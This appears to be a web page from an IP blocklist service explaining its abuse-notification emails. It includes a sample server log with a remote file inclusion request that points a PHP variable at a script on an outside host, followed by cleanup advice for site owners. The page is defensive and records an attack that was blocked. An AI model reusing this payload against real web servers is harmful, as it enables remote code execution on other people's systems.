Web Server Blocklist and Blacklist Information
Responsible persons listed in DNS get an email when a compromised machine attacks or attempts to abuse one of our servers. This is similar to what they will see:
Below is the IP address and type of attack recently observed and blocked on one of our web servers. The individual IP address is listed on the internet as a recommended deny for web servers or firewalls until we hear back from you that the machine in question has been fixed. Some ISP, NOC, web archive copies or lists that refer to this list may take two or more business days to reflect the removal of IP addresses. time of request: Wednesday September 21, 2011 - 05:43:47 AM PDT ip: 91.121.14.107 remote host: ns23561.ovh.net user-agent string: Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;) requested url: ////?_SERVER[DOCUMENT_ROOT]=http://www.miniprice.pl/osco/grace.txt?? referer: source port: 43925 destination port: 80 This message is generated only when attacks occur and is sent to the responsible parties listed in the DNS of the attacking IP address. Please see http://www.cruzit.com/botblock.php for more information on the fields in this message and what to do about it.
If you or your customer received this kind of message, the first thing you
should do, of course,
is take the machine off-line listed after “ip:”. A large percentage of machines
that are blocked are compromised with some sort of XSS issue. (Cross Site Scripting)
Someone has injected code in your web pages so that when someone visits your page,
data will get pulled from another machine and be presented (usually hidden) to that
person's browser. One thing to look for is code in your web pages like <iframe>
and/or <javascript> tags that you didn't put there. Also check your web server
and traffic logs for traffic requests going to or coming from the machine listed in the
“requested url:” section of the report we sent to you. In the above example
you would be looking for traffic to or from “http://www.miniprice.pl/”. The referer is quite often blank.
Note:
IP Addresses that have been blocked and reported are also listed
on the public blacklists.
One of which is HERE.
ISP, DNS, Mail Server and Site Owner personel use these lists for blocking and/or rejecting
similar attacks on their systems using rbl style or firewall rules such
as as PeerBlock, PeerGuardian linux, iplist, Vuze, Transmission,
uTorrent and, pfBlocker. They may not accept any traffic from
the blocked IP address.
If this tool helped you or your customer, please consider donating to the cause. Click the donation button below to make a donation. Any donation is helpful, as this site is supported entirely by donations.
All information on this web site is free. Most tools and some information requires signing in.
The only reason for this is to prevent abuse by bots and other nefarious agents that attempt baning our tools.
Please see our easy to read Privacy Policy for more information.
Yes, baning is a real word. (From approximately 1578) Just seeing if you were paying attention.